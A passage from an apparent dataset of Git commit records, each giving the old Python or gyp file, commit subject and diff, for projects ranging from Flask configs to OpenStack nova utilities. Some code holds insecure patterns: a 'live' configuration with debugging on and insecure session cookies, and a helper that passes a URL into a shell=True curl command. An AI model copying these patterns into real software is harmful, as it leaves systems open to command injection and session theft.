    SESSION_COOKIE_SECURE = False
    SESSION_PROTECTION = None
    PORT = 5000
    SQLALCHEMY_DATABASE_URI = os.environ.get('DATABASE_URL_development')
    STORAGE = '{}development'.format(os.environ.get('GOOGLE_STORE'))


class Preview(Config):
    DEBUG = True
    ENVIRONMENT = 'preview'
    SESSION_COOKIE_SECURE = False
    SESSION_PROTECTION = None
    PORT = 4000
    SQLALCHEMY_DATABASE_URI = os.environ.get('DATABASE_URL_preview')
    STORAGE = '{}preview'.format(os.environ.get('GOOGLE_STORE'))


class Live(Config):
    DEBUG = True
    ENVIRONMENT = 'live'
    SESSION_COOKIE_SECURE = False
    SESSION_PROTECTION = None
    PORT = 8000
    SQLALCHEMY_DATABASE_URI = os.environ.get('DATABASE_URL_live')
    STORAGE = '{}live'.format(os.environ.get('GOOGLE_STORE'))


configs = {
    'development': Development,
    # 'test': Test,
    'preview': Preview,
    # 'staging': Staging,
    'live': Live,
    # 'production': Live
}


if __name__ == '__main__':  # pragma: no cover
    main(sys.argv[1:])

lang: Python
proba: 0.000001
diff:
@@ -2767,16 +2767,70 @@
 T = 400
+    EMAIL_RESTRICT = os.environ.get('EMAIL_RESTRICT')
 

class
@@ -3113,32 +3113,52 @@
 GOOGLE_STORE'))
+    EMAIL_LIMIT = 3
 

class Preview(
@@ -3360,16 +3360,16 @@
 eview')
-
 STOR
@@ -3425,16 +3425,36 @@
 TORE'))
+    EMAIL_LIMIT = 3
 

class

commit: 961e595cdbed8dc88c14ae55dc4671c0b7c23031
subject: debug print
old_file: src/main/python/service_manager/util/services.py
new_file: src/main/python/service_manager/util/services.py
old_contents:

import json
import logging
import os
import subprocess
from collections import defaultdict

from service_manager.util.log_handler import print_red_bold

REPO_URL = 'repository_url'
REPOSITORY_NAME = 'repository'
REPOSITORY_URL = 'repository_url'
DESCRIPTION = 'description'
ROLE = 'role'
APPLICATION = 'application'
FQN = 'project_name'
SERVICE_TYPE = 'service-type'


class Application(dict):
    def __init__(self, application):
        super(Application, self).__init__()
        self.application = application

    def add_service(self, role, service):
        self[role] = service

    def get_contract_test_git_url(self):
        for name, definition in self.iteritems():
            if definition.get_service_type() == 'contract-tests':
                return definition.get_git_url()


class Service(dict):
    def __init__(self, app, role, definition, app_reference=None):
        super(Service, self).__init__()
        self.update(definition)
        self.app_ref = app_reference
        self[APPLICATION] = app
        self[ROLE] = role
        self[FQN] = self.get_fully_qualified_service_name()

    def get_fully_qualified_service_name(self):
        return "{application}-{role}".format(**self).replace(' ', '_')

    def get_description(self):
        return self[DESCRIPTION]

    def get_service_type(self):
        return self[SERVICE_TYPE]

    def repo_exists(self):
        return REPOSITORY_URL in self

    def get_role(self):
        return self[ROLE]

    def get_app(self):
        return self[APPLICATION]

    def get_repository_name(self):
        return self[REPOSITORY_NAME] if REPOSITORY_NAME in self else self.get_fully_qualified_service_name()

    def set_git_url(self, url):
        self[REPO_URL] = url

    def get_git_url(self):
        return self.get(REPO_URL, None)

    def get_contract_test_git_url(self):
        return self.app_ref.get_contract_test_git_url()

    def get_service_directory(self, app_dir):
        return os.path.join(app_dir, self.get_fully_qualified_service_name())


def load_service_definitions(service_directory, app_filter=None):
    service_dir = os.path.abspath(service_directory)
    listdir = os.listdir(service_dir)
    service_map = defaultdict(dict)
    for dir in listdir:
        if _is_valid_app(dir, service_dir) and application_filter(app_filter, dir):
            service_definition_file = os.path.join(service_dir, dir, 'service.json')
            if not os.path.exists(service_definition_file):
                logging.warn("Found invalid application directory - no service.json exists - {}".format(service_dir))
            else:
                service_map[dir] = Application(dir)
                with open(service_definition_file) as service_def:
                    service_definitions = json.load(service_def)
                    for role, definition in service_definitions.iteritems():
                        service_map[dir].add_service(role, Service(app=dir, role=role, definition=definition, app_reference=service_map[dir]))
    return service_map


def _is_valid_app(dir, service_dir):
    return os.path.isdir(os.path.join(service_dir, dir)) and not dir.startswith('.')


def application_filter(app_filter, application):
    return app_filter is None or application.startswith(app_filter)


def walk_service_map(application_map, application_callback, service_callback):
    for application, service_map in application_map.iteritems():
        if application_callback:
            application_callback(application)
        for service, service_definition in service_map.iteritems():
            if service_callback:
                service_callback(service_definition)


def pretty_print_application(app):
    logging.error(u"{}".format(app))


def pretty_print_service(service_definition):
    logging.warn(u"\t {}".format(service_definition.get_role()))
    for dat in service_definition:
        secondary_indent = '\t\t' if len(dat) <= 10 else '\t'
        logging.info(u"\t\t {}{}- {}".format(dat, secondary_indent, service_definition[dat]))


def pretty_print_services(application_map):
    walk_service_map(application_map, pretty_print_application, pretty_print_service)


def safe_mkdir(destination_directory):
    if not os.path.exists(destination_directory):
        os.mkdir(destination_directory)


def ensure_service_directory_exists(destination_directory, service_defintion):
    app_dir = os.path.join(destination_directory, service_defintion.get_app())
    safe_mkdir(app_dir)
    return app_dir


def invoke_process(args, exec_dir=None, dry_run=False):
    if dry_run:
        print_red_bold(u"\t {}".format(str(args)))
        return 0
    else:
        arg_list = {'args': args}
        if exec_dir:
            arg_list['cwd'] = exec_dir
        return subprocess.call(**arg_list)

lang: Python
proba: 0.000003
diff:
@@ -4521,24 +4521,71 @@
 run=False):
+    print_red_bold(u"\t {}".format(str(args)))
 if dry_r

commit: a57e38233679bf6d95dad533d87ce1c69c00cc26
subject: Include process name
old_file: docker-memusage.py
new_file: docker-memusage.py
old_contents:

#!/usr/bin/env python
from collections import OrderedDict
from pprint import pprint
import os.path
import re
import sys


def parse_mem_file(filename):
    data = OrderedDict()
    with open(filename, 'rb') as f:
        for line in f:
            splittage = line.split(':')
            data[splittage[0]] = splittage[1].strip()
    return data


def get_system_mem_usage():
    """Return the information in /proc/meminfo as a dictionary."""
    return parse_mem_file('/proc/meminfo')


def get_process_mem_usage():
    re_pid = re.compile(r'^\d+$')
    re_mem = re.compile(r'^(\d+) .+$')
    pid2usage = {}
    for pid in [d for d in os.listdir('/proc') if re_pid.match(d)]:
        fpath = os.path.join('/proc', pid, 'status')
        try:
            data = parse_mem_file(fpath)
        except IOError:
            continue

        try:
            pid2usage[pid] = int(re_mem.match(data['VmHWM']).group(1)) / 1024.
        except KeyError:
            continue
    return OrderedDict(
        sorted(pid2usage.iteritems(), key=lambda x: x[1], reverse=True))


pid2usage = get_process_mem_usage()
total_usage = sum(pid2usage.values())
print('Total memory usage: {:.2f}'.format(total_usage))
for pid, usage in pid2usage.iteritems():
    print('{}: {:.2f} MB'.format(pid, usage))

lang: Python
proba: 0.000002
diff:
@@ -55,34 +55,8 @@
 ict
-from pprint import pprint
 impo
@@ -80,19 +80,8 @@
 re
-import sys
 de
@@ -795,32 +795,64 @@
 e

        try:
+            name = data['name']
 pid2
@@ -861,19 +861,27 @@
 age[
+(
 pid
+, name)
 ] = int(
@@ -876,16 +876,33 @@
 ] = int(
+
 re_mem.m
@@ -1222,16 +1222,20 @@
 
for pid
+_etc
 , usage
@@ -1256,24 +1256,46 @@
 teritems():
+    [pid, name] = pid
 print('{
@@ -1295,16 +1295,21 @@
 rint('{}
+ ({})
 : {:.2f}
@@ -1320,16 +1320,22 @@
 .format(
+name,
 pid, usa

commit: 57b707b7f7e7076f8c1f84e57ba3a3db45135340
subject: Fix compilations for macos mountain lion
old_file: binding.gyp
new_file: binding.gyp
old_contents:

{
	"targets": [
		{
			"target_name": "protobuf_for_node",
			"include_dirs": ["protobuf/src"],
			"dependencies": ["protobuf/protobuf.gyp:protobuf_full_do_not_use"],
			"sources": [
				"protobuf_for_node.cc",
				"addon.cc"
			]
		}
	]
}

lang: Python
proba: 0.000006
diff:
@@ -215,16 +215,187 @@
 don.cc"
+			],
+			'conditions': [
+				[
+					'OS =="mac"',{
+						'xcode_settings':{
+						 'OTHER_CFLAGS' : [
+							'-mmacosx-version-min=10.7'
+						 ]
+						}
+					}
+				]
 			]
 		}

commit: 644fbef7030f0685be7dd056606ab23daaefdc72
subject: Fix typo in error message variable
old_file: app/gitlab.py
new_file: app/gitlab.py
old_contents:

from __future__ import absolute_import
from __future__ import unicode_literals

from .webhooks import WebHook
from werkzeug.exceptions import BadRequest, NotImplemented

EVENTS = {
    'Push Hook': 'push',
    'Tag Push Hook': 'tag_push',
    'Issue Hook': 'issue',
    'Note Hook': 'note',
    'Merge Request Hook': 'merge_request'
}


class GitlabWebHook(WebHook):

    def event(self, request):
        gitlab_header = request.headers.get('X-Gitlab-Event', None)

        if not gitlab_header:
            raise BadRequest('Gitlab requests must provide a X-Gitlab-Event header')

        event = EVENTS.get(gitlab_header, None)

        if not event:
            raise NotImplemented('Header not understood %s' % githab_header)

        if event == 'note':
            if 'commit' in request.json:
                event = 'commit_comment'
            elif 'merge_request' in request.json:
                event = 'merge_request_comment'
            elif 'issue' in request.json:
                event = 'issue_comment'
            elif 'snippet' in request.json:
                event = 'snippet_comment'

        return event

lang: Python
proba: 0.000178
diff:
@@ -709,17 +709,17 @@
 s' % git
-h
+l
 ab_heade

commit: 893b9947ef8d884ff67c84a60ea2c251b408a6d0
subject: update build_db.py script
old_file: build_db.py
new_file: build_db.py
old_contents:

import json
import os
import sqlite3

WEEKDAYS = 0x1
SATURDAY = 0x2
SUNDAY = 0x3


def setup(conn):
    cursor = conn.cursor()

    cursor.execute(
        '''
        CREATE TABLE IF NOT EXISTS visit (
            stop_num text,
            visit_day_type integer,
            route_num integer,
            hour integer,
            minute integer
        )
        '''
    )
    cursor.execute('CREATE INDEX visit_stop_num_idx ON visit (stop_num);')


def dump_data(data, conn):
    cursor = conn.cursor()

    for stop_num, day_types in data.items():
        types = zip([WEEKDAYS, SATURDAY, SUNDAY], day_types)
        for day_type_num, day_type in types:
            for visit in day_type:
                hour, minute = map(int, visit[1].split(':'))

                cursor.execute(
                    'INSERT INTO visit VALUES (?, ?, ?, ?, ?)',
                    (
                        str(stop_num),
                        day_type_num,
                        visit[0],
                        hour,
                        minute
                    )
                )


def main():
    db = 'Assets/transperthcache.db'
    if os.path.exists(db):
        os.unlink(db)

    conn = sqlite3.connect(db)
    setup(conn)

    with open('transperthcache.json') as fh:
        dump_data(
            json.load(fh),
            conn
        )

    conn.commit()


if __name__ == '__main__':
    main()

lang: Python
proba: 0.000001
diff:
@@ -457,16 +457,202 @@
 um);')
+    cursor.execute(
+        'CREATE TABLE "android_metadata" ("locale" TEXT DEFAULT "en_US");'
+    )
+    cursor.execute(
+        'INSERT INTO "android_metadata" VALUES ("en_US")'
+    )
+
 

def dum
@@ -1302,17 +1302,17 @@
 db = '
-A
+a
 ssets/tr
@@ -1565,16 +1565,33 @@
 ommit()
+    conn.close()
 

if __n

commit: 7f01aa6deaa9a13ca388fb4c84849bce53d34d5f
subject: Make sure C++11 is used under Mac OS
old_file: binding.gyp
new_file: binding.gyp
old_contents:

{
    "targets": [{
        "target_name": "mmap-io",
        "sources": [ "src/mmap-io.cc" ],
        "include_dirs": [ "<!(node -e \"require('nan')\")" ],
        "cflags_cc": [ "-std=c++11" ]
    }]
}

lang: Python
proba: 0
diff:
@@ -218,16 +218,339 @@
 =c++11"
+        ],
+        "conditions": [
+            [ 'OS=="mac"',
+                { "xcode_settings": {
+                    'OTHER_CPLUSPLUSFLAGS' : ['-std=c++11','-stdlib=libc++'],
+                    'OTHER_LDFLAGS': ['-stdlib=libc++'],
+                    'MACOSX_DEPLOYMENT_TARGET': '10.7'
+                }}
+            ]

commit: 6b6948b4dcf7400eefcfb2a499c0180d03052550
subject: Remove unnecessary string formatting
old_file: sympy/matrices/expressions/dotproduct.py
new_file: sympy/matrices/expressions/dotproduct.py
old_contents:

from __future__ import print_function, division

from sympy.core import Basic
from sympy.core.sympify import _sympify
from sympy.matrices.expressions.transpose import transpose
from sympy.matrices.expressions.matexpr import MatrixExpr


class DotProduct(MatrixExpr):
    """
    Dot Product of vector matrices
    """

    def __new__(cls, arg1, arg2):
        arg1, arg2 = _sympify((arg1, arg2))

        if not arg1.is_Matrix:
            raise TypeError("Argument 1 of DotProduct is not a matrix" % str(arg1))
        if not arg2.is_Matrix:
            raise TypeError("Argument 2 of DotProduct is not a matrix" % str(arg2))
        if not (1 in arg1.shape):
            raise TypeError("Argument 1 of DotProduct is not a vector" % str(arg1))
        if not (1 in arg2.shape):
            raise TypeError("Argument 2 of DotProduct is not a vector" % str(arg1))
        if arg1.shape != arg2.shape:
            raise TypeError("Input to Dot Product, %s and %s, are not of same dimensions" % (str(arg1), str(arg2)))

        return Basic.__new__(cls, arg1, arg2)

    def doit(self, expand=False):
        try:
            if self.args[0].shape[0] == 1:
                return (self.args[0]*transpose(self.args[1])).doit()[0]
            else:
                return (transpose(self.args[0])*self.args[1]).doit()[0]
        except (AttributeError, NotImplementedError):
            return self

lang: Python
proba: 0.005099
diff:
@@ -496,28 +496,16 @@
 matrix"
- % str(arg1)
 )
@@ -603,20 +603,8 @@
 rix"
- % str(arg2)
 )
@@ -705,28 +705,16 @@
 vector"
- % str(arg1)
 )
@@ -815,20 +815,8 @@
 tor"
- % str(arg1)
 )

commit: a6dff532d75d0a63c59db0cbf800587845d587a1
subject: add compiler flag
old_file: binding.gyp
new_file: binding.gyp
old_contents:

{
    "targets": [
        {
            "target_name": "addon",
            "sources": [ "src/addon.cc", "src/object.cc", "src/async.cc", "src/engine.cc", "src/results.cc" ],
            "cflags": [
                "-O2",
                "-Wendif-labels",
                "-Werror",
                "-Wpedantic",
                "-Wunused-parameter",
                "-finline-functions",
                "-funswitch-loops",
                "-fpredictive-commoning",
                "-fgcse-after-reload",
                "-ftree-vectorize",
                "-fvect-cost-model",
                "-ftree-partial-pre"
            ],
            "cflags!": [ "-Wno-unused-parameter", "-O3" ],
            "cflags_cc": [ "-std=gnu++11" ],
            "cflags_cc!": [ "-fno-exceptions", "-fno-rtti", "-std=gnu++1y", "-std=gnu++0x" ],
            "include_dirs": ["<!@(node -p \"require('node-addon-api').include\")"],
            "dependencies": ["<!(node -p \"require('node-addon-api').gyp\")"],
            "defines": [ "NAPI_CPP_EXCEPTIONS", "NODE_ADDON_API_DISABLE_DEPRECATED" ],
            "conditions": [
                ["OS==\"win\"", {
                    "msvs_settings": {
                        "VCCLCompilerTool": { "ExceptionHandling": 1 }
                    }
                }],
                ["OS==\"mac\"", {
                    "xcode_settings": {
                        "CLANG_CXX_LANGUAGE_STANDARD": 'c++11',
                        "CLANG_CXX_LIBRARY": "libc++",
                        "GCC_ENABLE_CPP_EXCEPTIONS": "YES",
                        "MACOSX_DEPLOYMENT_TARGET": "10.7",
                        "GCC_ENABLE_CPP_RTTI" : "YES",
                        # "fast", "3", "2", "1", "0", "", "s"
                        "GCC_OPTIMIZATION_LEVEL": "2",
                        # only passed to C files
                        "OTHER_CFLAGS" : [],
                        # remove defaults passed to C files
                        "OTHER_CFLAGS!": [ "-fno-strict-aliasing" ],
                        # only passed to C++ files
                        "OTHER_CPLUSPLUSFLAGS": [],
                        # remove defaults passed to C++ files
                        "OTHER_CPLUSPLUSFLAGS!": [],
                        # passed to both C/C++ files
                        "WARNING_CFLAGS": [ "-Werror", "-Wextra", "-Wpedantic", "-Wunused-parameter" ],
                        # remove defaults passed to both C/C++ files
                        "WARNING_CFLAGS!": [ "-Wno-unused-parameter", "-W" ]
                    }
                }]
            ]
        }
    ]
}
# several options for flags, cflags_cc(appends), cflags_cc+(prepends), cflags_cc!(negates)
# if -O3 and -O2 are both passed, whichever is passed last wins the race
# see https://github.com/nodejs/node/blob/master/common.gypi

lang: Python
proba: 0.000002
diff:
@@ -429,16 +429,34 @@
 ial-pre"
+, "-fipa-cp-clone"
 ],

commit: 5e2ef9885a65d61edcdffaef9e4f8a960bef567e
subject: Refactor CAS tests.
old_file: fridge/test/test_cas.py
new_file: fridge/test/test_cas.py
old_contents:

import pytest

from fridge.cas import ContentAddressableStorage
from fridge.memoryfs import MemoryFS


class TestContentAddressableStorage(object):
    def create_cas(self, fs=None, path='cas'):
        if fs is None:
            fs = MemoryFS()
        return ContentAddressableStorage(path, fs)

    def has_root_property(self):
        cas = self.create_cas(path='cas_root')
        assert cas.root == 'cas_root'

    def test_allows_to_store_and_retrieve_files(self):
        fs = MemoryFS()
        cas = self.create_cas(fs)
        with fs.open('testfile', 'w') as f:
            f.write(u'dummy content')
        key = cas.store('testfile')

        # Close and reopen
        del cas
        cas = self.create_cas(fs)

        with fs.open(cas.get_path(key), 'r') as f:
            content = f.read()
        assert content == u'dummy content'

    def test_file_removed_after_store(self):
        fs = MemoryFS()
        cas = self.create_cas(fs)
        with fs.open('testfile', 'w') as f:
            f.write(u'dummy content')
        cas.store('testfile')
        assert not fs.exists('testfile')

    def test_writing_original_files_keeps_stored_file_unchanged(self):
        fs = MemoryFS()
        cas = self.create_cas(fs)
        with fs.open('testfile', 'w') as f:
            f.write(u'dummy content')
        key = cas.store('testfile')
        del cas  # Close

        with fs.open('testfile', 'w') as f:
            f.write(u'replaced content')

        cas = self.create_cas(fs)
        with fs.open(cas.get_path(key), 'r') as f:
            content = f.read()
        assert content == u'dummy content'

    def test_stores_blobs_write_protected(self):
        fs = MemoryFS()
        cas = self.create_cas(fs)
        with fs.open('testfile', 'w') as f:
            f.write(u'dummy content')
        key = cas.store('testfile')

        with pytest.raises(OSError):
            with fs.open(cas.get_path(key), 'w'):
                pass

lang: Python
proba: 0
diff:
@@ -73,182 +73,205 @@
 dge.
-memoryfs import MemoryFS
-
-
-class TestContentAddressableStorage(object):
-    def create_cas(self, fs=None, path='cas'):
-        if fs is None:
-            fs = MemoryFS()
+fstest import (
+    assert_file_content_equal, assert_open_raises, write_file)
+from fridge.memoryfs import MemoryFS
+
+
+@pytest.fixture
+def fs():
+    return MemoryFS()
+
+
+@pytest.fixture
+def cas(fs):
@@ -307,19 +307,66 @@
 age(
-path
+'cas'
 , fs)
+
+class TestContentAddressableStorage(object):
@@ -387,24 +387,28 @@
 roperty(self
+, fs
 ):
@@ -416,28 +416,38 @@
 s = 
-self.create_cas(path
+ContentAddressableStorage(root
 ='ca
@@ -453,16 +453,23 @@
 as_root'
+, fs=fs
 )
@@ -557,149 +557,120 @@
 self
-):
-        fs = MemoryFS()
-        cas = self.create_cas(fs)
-        with fs.open('testfile', 'w') as f:
-            f.write(u'dummy content'
+, fs):
+        write_file(fs, 'testfile', u'dummy content')
+        cas = ContentAddressableStorage('cas', fs=fs
 )
@@ -760,32 +760,52 @@
 cas = 
-self.create_cas(
+ContentAddressableStorage('cas', fs=
 fs)
@@ -918,32 +918,33 @@
 dummy content'
+
 def test_fil
@@ -973,68 +973,19 @@
 self
-):
-        fs = MemoryFS()
-        cas = self.create_cas(fs)
+, fs, cas):
@@ -1207,149 +1207,121 @@
 self
-):
-        fs = MemoryFS()
-        cas = self.create_cas(fs)
-        with fs.open('testfile', 'w') as f:
-            f.write(u'dummy content'
+, fs):
+        write_file(fs, 'testfile', u'dummy content')
+
+        cas = ContentAddressableStorage('cas', fs=fs
 )
@@ -1385,36 +1385,38 @@
 e

        w
+r
 it
-h fs.open(
+e_file(fs,
 'testfile',
@@ -1419,39 +1419,8 @@
 e',
-'w') as f:
-            f.write(
 u're
@@ -1454,484 +1454,119 @@
 s = 
-self.create_cas(fs)
-        with fs.open(cas.get_path(key), 'r') as f:
-            content = f.read()
-        assert content == u'dummy content'
-
-    def test_stores_blobs_write_protected(self):
-        fs = MemoryFS()
-        cas = self.create_cas(fs)
-        with fs.open('testfile', 'w') as f:
-            f.write(u'dummy content')
-        key = cas.store('testfile')
-
-        with pytest.raises(OSError):
-            with fs.open(cas.get_path(key), 'w'):
-                pass
+ContentAddressableStorage('cas', fs=fs)
+        assert_file_content_equal(fs, cas.get_path(key), u'dummy content')

167101baa4d57d22bc6a40d7ff8afd3688e23580
fix ControlText focusout bug
pyforms/gui/Controls/ControlText.py
pyforms/gui/Controls/ControlText.py
#!/usr/bin/python # -*- coding: utf-8 -*- ''' @author: Ricardo Ribeiro @credits: Ricardo Ribeiro @license: MIT @version: 0.0 @maintainer: Ricardo Ribeiro @email: [email protected] @status: Development @lastEditedBy: Carlos Mão de Ferro ([email protected]) ''' from pyforms.gui.Controls.ControlBase import ControlBase import pyforms.Utils.tools as tools from PyQt4 import uic class ControlText(ControlBase): def initForm(self): control_path = tools.getFileInSameDirectory(__file__, "textInput.ui") self._form = uic.loadUi(control_path) self.form.label.setText(self._label) self.form.lineEdit.setText(self._value) self.form.setToolTip(self.help) super(ControlText, self).initForm() self.form.lineEdit.editingFinished.connect(self.finishEditing) def finishEditing(self): """Function called when the lineEdit widget is edited""" self.changed() self.form.lineEdit.focusNextChild() ################################################################### ############ Properties ########################################### ################################################################### @property def value(self): self._value = str(self._form.lineEdit.text()) return self._value @value.setter def value(self, value): self._form.lineEdit.setText(value) ControlBase.value.fset(self, value) @property def label(self): return self.form.label.text() @label.setter def label(self, value): self.form.label.setText(value) ControlBase.label.fset(self, value)
Python
0
@@ -891,44 +891,8 @@
 )
-		self.form.lineEdit.focusNextChild()
 
	##

commit: 22cf663731bc556ef625695ab3213e87432ed4f9
subject: fix docs link
old_file: pyvex/__init__.py
new_file: pyvex/__init__.py
old_contents:

"""
PyVEX provides an interface that translates binary code into the VEX intermediate represenation (IR).
For an introduction to VEX, take a look here: https://docs.angr.io/docs/ir.html
"""

__version__ = (8, 19, 4, 5)

if bytes is str:
    raise Exception("This module is designed for python 3 only. Please install an older version to use python 2.")

import os
import sys
import cffi
import pkg_resources

from .vex_ffi import ffi_str as _ffi_str
ffi = cffi.FFI()

import logging
logging.getLogger("pyvex").addHandler(logging.NullHandler())


def _find_c_lib():
    # Load the c library for calling into VEX
    if sys.platform in ('win32', 'cygwin'):
        library_file = 'pyvex.dll'
    elif sys.platform == 'darwin':
        library_file = "libpyvex.dylib"
    else:
        library_file = "libpyvex.so"

    pyvex_path = pkg_resources.resource_filename(__name__, os.path.join('lib', library_file))

    ffi.cdef(_ffi_str)
    # RTLD_GLOBAL used for sim_unicorn.so
    lib = ffi.dlopen(pyvex_path)
    lib.vex_init()
    # this looks up all the definitions (wtf)
    dir(lib)
    return lib


pvc = _find_c_lib()

# pylint: disable=wildcard-import
from .enums import *
from . import stmt, expr, const
from .block import IRSB, IRTypeEnv
from .expr import get_op_retty
from .const import tag_to_const_class, get_type_size, get_type_spec_size
from .lifting import lift, lifters
from .errors import PyVEXError

# aliases....
IRStmt = stmt
IRExpr = expr
IRConst = const

lang: Python
proba: 0
diff:
@@ -170,20 +170,26 @@
 .io/
-docs/ir.html
+advanced-topics/ir
 
"""

commit: d9a034e74bf03a5a9837201d2e358d51e759f112
subject: add dc_aware_policy
old_file: binding.gyp
new_file: binding.gyp
old_contents:

{
    "targets": [
        {
            "target_name": "cassandra-native",
            "sources": [
                "cpp-driver/src/address.cpp",
                "cpp-driver/src/auth.cpp",
                "cpp-driver/src/auth_requests.cpp",
                "cpp-driver/src/auth_responses.cpp",
                "cpp-driver/src/batch_request.cpp",
                "cpp-driver/src/buffer.cpp",
                "cpp-driver/src/buffer_collection.cpp",
                "cpp-driver/src/cluster.cpp",
                "cpp-driver/src/cluster_metadata.cpp",
                "cpp-driver/src/collection_iterator.cpp",
                "cpp-driver/src/common.cpp",
                "cpp-driver/src/connection.cpp",
                "cpp-driver/src/control_connection.cpp",
                "cpp-driver/src/error_response.cpp",
                "cpp-driver/src/event_response.cpp",
                "cpp-driver/src/execute_request.cpp",
                "cpp-driver/src/future.cpp",
                "cpp-driver/src/get_time.cpp",
                "cpp-driver/src/handler.cpp",
                "cpp-driver/src/io_worker.cpp",
                "cpp-driver/src/iterator.cpp",
                "cpp-driver/src/logger.cpp",
                "cpp-driver/src/map_iterator.cpp",
                "cpp-driver/src/md5.cpp",
                "cpp-driver/src/multiple_request_handler.cpp",
                "cpp-driver/src/murmur3.cpp",
                "cpp-driver/src/pool.cpp",
                "cpp-driver/src/prepare_handler.cpp",
                "cpp-driver/src/prepare_request.cpp",
                "cpp-driver/src/prepared.cpp",
                "cpp-driver/src/query_request.cpp",
                "cpp-driver/src/register_request.cpp",
                "cpp-driver/src/replication_strategy.cpp",
                "cpp-driver/src/request_handler.cpp",
                "cpp-driver/src/response.cpp",
                "cpp-driver/src/result_metadata.cpp",
                "cpp-driver/src/result_response.cpp",
                "cpp-driver/src/ring_buffer.cpp",
                "cpp-driver/src/row.cpp",
                "cpp-driver/src/schema_change_handler.cpp",
                "cpp-driver/src/schema_metadata.cpp",
                "cpp-driver/src/session.cpp",
                "cpp-driver/src/set_keyspace_handler.cpp",
                "cpp-driver/src/ssl.cpp",
                "cpp-driver/src/startup_request.cpp",
                "cpp-driver/src/statement.cpp",
                "cpp-driver/src/supported_response.cpp",
                "cpp-driver/src/testing.cpp",
                "cpp-driver/src/token_aware_policy.cpp",
                "cpp-driver/src/token_map.cpp",
                "cpp-driver/src/type_parser.cpp",
                "cpp-driver/src/types.cpp",
                "cpp-driver/src/uuids.cpp",
                "cpp-driver/src/value.cpp"
            ],
            "include_dirs": [
                "<!(node -e \"require('nan')\")",
                "cpp-driver/include",
                "cpp-driver/src/third_party/boost",
                "cpp-driver/src/third_party/rapidjson"
            ],
            "defines": [
                "DISABLE_UUID_GENERATION"
            ]
        }
    ]
}

lang: Python
proba: 0.000039
diff:
@@ -621,32 +621,78 @@
 onnection.cpp",
+                "cpp-driver/src/dc_aware_policy.cpp",
 "cpp-dri

commit: fb53f764a82dd8e6d1992c4c254e90c185fd9c53
subject: Change socket type in nova.utils.get_my_ip() to SOCK_DGRAM. This way, we don't actually have to set up a connection. Also, change the destination host to an IP (chose one of Google's DNS's at random) rather than a hostname, so we avoid doing a DNS lookup.
old_file: nova/utils.py
new_file: nova/utils.py
old_contents:

# vim: tabstop=4 shiftwidth=4 softtabstop=4

# Copyright 2010 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
#
#    Licensed under the Apache License, Version 2.0 (the "License"); you may
#    not use this file except in compliance with the License. You may obtain
#    a copy of the License at
#
#         http://www.apache.org/licenses/LICENSE-2.0
#
#    Unless required by applicable law or agreed to in writing, software
#    distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
#    WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
#    License for the specific language governing permissions and limitations
#    under the License.

"""
System-level utilities and helper functions.
"""

import datetime
import inspect
import logging
import os
import random
import subprocess
import socket
import sys
from xml.sax import saxutils

from twisted.internet.threads import deferToThread

from nova import exception
from nova import flags
from nova.exception import ProcessExecutionError


FLAGS = flags.FLAGS

TIME_FORMAT = "%Y-%m-%dT%H:%M:%SZ"


def import_class(import_str):
    """Returns a class from a string including module and class"""
    mod_str, _sep, class_str = import_str.rpartition('.')
    try:
        __import__(mod_str)
        return getattr(sys.modules[mod_str], class_str)
    except (ImportError, ValueError, AttributeError):
        raise exception.NotFound('Class %s cannot be found' % class_str)


def import_object(import_str):
    """Returns an object including a module or module and class"""
    try:
        __import__(import_str)
        return sys.modules[import_str]
    except ImportError:
        cls = import_class(import_str)
        return cls()


def fetchfile(url, target):
    logging.debug("Fetching %s" % url)
#    c = pycurl.Curl()
#    fp = open(target, "wb")
#    c.setopt(c.URL, url)
#    c.setopt(c.WRITEDATA, fp)
#    c.perform()
#    c.close()
#    fp.close()
    execute("curl --fail %s -o %s" % (url, target))


def execute(cmd, process_input=None, addl_env=None, check_exit_code=True):
    logging.debug("Running cmd: %s", cmd)
    env = os.environ.copy()
    if addl_env:
        env.update(addl_env)
    obj = subprocess.Popen(cmd, shell=True, stdin=subprocess.PIPE,
                           stdout=subprocess.PIPE, stderr=subprocess.PIPE,
                           env=env)
    result = None
    if process_input != None:
        result = obj.communicate(process_input)
    else:
        result = obj.communicate()
    obj.stdin.close()
    if obj.returncode:
        logging.debug("Result was %s" % (obj.returncode))
        if check_exit_code and obj.returncode != 0:
            (stdout, stderr) = result
            raise ProcessExecutionError(exit_code=obj.returncode,
                                        stdout=stdout,
                                        stderr=stderr,
                                        cmd=cmd)
    return result


def abspath(s):
    return os.path.join(os.path.dirname(__file__), s)


def default_flagfile(filename='nova.conf'):
    for arg in sys.argv:
        if arg.find('flagfile') != -1:
            break
    else:
        if not os.path.isabs(filename):
            # turn relative filename into an absolute path
            script_dir = os.path.dirname(inspect.stack()[-1][1])
            filename = os.path.abspath(os.path.join(script_dir, filename))
        if os.path.exists(filename):
            flagfile = ['--flagfile=%s' % filename]
            sys.argv = sys.argv[:1] + flagfile + sys.argv[1:]


def debug(arg):
    logging.debug('debug in callback: %s', arg)
    return arg


def runthis(prompt, cmd, check_exit_code=True):
    logging.debug("Running %s" % (cmd))
    exit_code = subprocess.call(cmd.split(" "))
    logging.debug(prompt % (exit_code))
    if check_exit_code and exit_code != 0:
        raise ProcessExecutionError(exit_code=exit_code,
                                    stdout=None,
                                    stderr=None,
                                    cmd=cmd)


def generate_uid(topic, size=8):
    characters = '01234567890abcdefghijklmnopqrstuvwxyz'
    choices = [random.choice(characters) for x in xrange(size)]
    return '%s-%s' % (topic, ''.join(choices))


def generate_mac():
    mac = [0x02, 0x16, 0x3e,
           random.randint(0x00, 0x7f),
           random.randint(0x00, 0xff),
           random.randint(0x00, 0xff)]
    return ':'.join(map(lambda x: "%02x" % x, mac))


def last_octet(address):
    return int(address.split(".")[-1])


def get_my_ip():
    """Returns the actual ip of the local machine."""
    if getattr(FLAGS, 'fake_tests', None):
        return '127.0.0.1'
    try:
        csock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        csock.connect(('www.google.com', 80))
        (addr, port) = csock.getsockname()
        csock.close()
        return addr
    except socket.gaierror as ex:
        logging.warn("Couldn't get IP, using 127.0.0.1 %s", ex)
        return "127.0.0.1"


def isotime(at=None):
    if not at:
        at = datetime.datetime.utcnow()
    return at.strftime(TIME_FORMAT)


def parse_isotime(timestr):
    return datetime.datetime.strptime(timestr, TIME_FORMAT)


class LazyPluggable(object):
    """A pluggable backend loaded lazily based on some value."""

